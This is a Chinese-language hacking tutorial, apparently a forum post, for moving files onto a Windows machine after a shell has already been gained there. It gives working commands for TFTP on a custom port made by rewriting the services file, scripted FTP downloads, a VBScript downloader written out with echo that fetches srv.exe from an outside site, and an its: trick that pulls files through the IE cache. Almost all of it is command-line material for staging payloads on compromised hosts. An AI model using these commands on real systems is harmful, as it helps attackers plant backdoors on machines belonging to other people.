本文是居于已经得到了一个有一定权限的SHELL.用IPC$传送文件和TFTP传送文件不可行。实现在命令行下传送文件的其他方法.
一,TFTP+自定义端口
限制用TFTP传送文件,一般就是直接封69端口,我们在用TFTP传送文件的时候,一般用tftp -i xxx.xxx.xxx.xxx get srv.exe来下载,TFTP默认的是69端口,那么怎么才能改这个端口了?TFTPD32.exe等TFTP服务端是可以自己设置端口的,这里就不多讲,只不过在设置后要重新启动一次
TFTP服务端。至于客户端
在system32\drivers\etc\文件夹下有一个services文件。打开如下:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This file contains port numbers for well-known services defined by IANA
#
# Format:
#
# <service name> <port number>/<protocol> [aliases...] [#<comment>]
#
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users #Active users
systat 11/tcp users #Active users
...
tftp 69/udp #Trivial File Transfer
...
不难看出,69/udp就是定义tftp默认端口的,协议为udp。
好啦!具体怎么用只要这两句,其实就是比原来多加了一句改端口的:
echo tftp 8300/udp > %systemroot%\system32\drivers\etc\services
tftp -i xxx.xxx.xxx.xxx get srv.exe
注意:请先把tftp服务端端口设定为与自定义端口一样的,这里是8300。
安全点的做法:
ren %systemroot%\system32\drivers\etc\services 1
echo tftp 8300/udp >2
copy 2+%systemroot%\system32\drivers\etc\1 %systemroot%\system32\drivers\etc\services
二:ftp下载文件
ftp下载文件一般步骤如下:
echo open xxx.xxx.xxx.xxx >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt(这一步是关键哟)
del ftp.txt
这样srv.exe文件就下在下来了。
三:ftp+自定义端口
其实ftp自定义端口非常简单,只要在ip地址后面空格,紧跟自定义的端口就可以了,如下:
echo open xxx.xxx.xxx.xxx 2121 >ftp.txt
echo user >>ftp.txt
echo password >>ftp.txt
echo binary >>ftp.txt [可选]
echo get srv.exe >>ftp.txt
echo bye >>ftp.txt
ftp -s:ftp.txt
del ftp.txt
这里自定义端口为2121,只要和ftp服务端的端口一致就行拉。
四:写程序下载
脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用
echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序
实例的简化:
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "srv.exe",2 >>webdown.vbs
然后执行cscript webdown.vbs就可以啦.其中,http://txhak.126.com/srv.exe改成你放文件的网站路径,srv.exe可以改成保存文件的路径。
五:START ITS:HTTP://IP/文件名
然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"
然后DIR 文件名[1]
注意:那串长文件名要用""引起来,因为有空格
例子:C:\Documents and Settings\Administrator>start its:http://xxx.xxx.xxx.xxx/srv.exe
C:\Documents and Settings\Administrator>dir /s srv[1].exe
驱动器 C 中的卷没有标签。
卷的序列号是 D491-7A7F
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目录
2003-11-22 17:48 12,832 srv[1].exe
1 个文件 12,832 字节
列出所有文件:
1 个文件 12,832 字节
0 个目录 6,425,985,024 可用字节
C:\Documents and Settings\Administrator>copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe
已复制 1 个文件。
其他方法希望大家自己发现。也希望能和我讨论.
|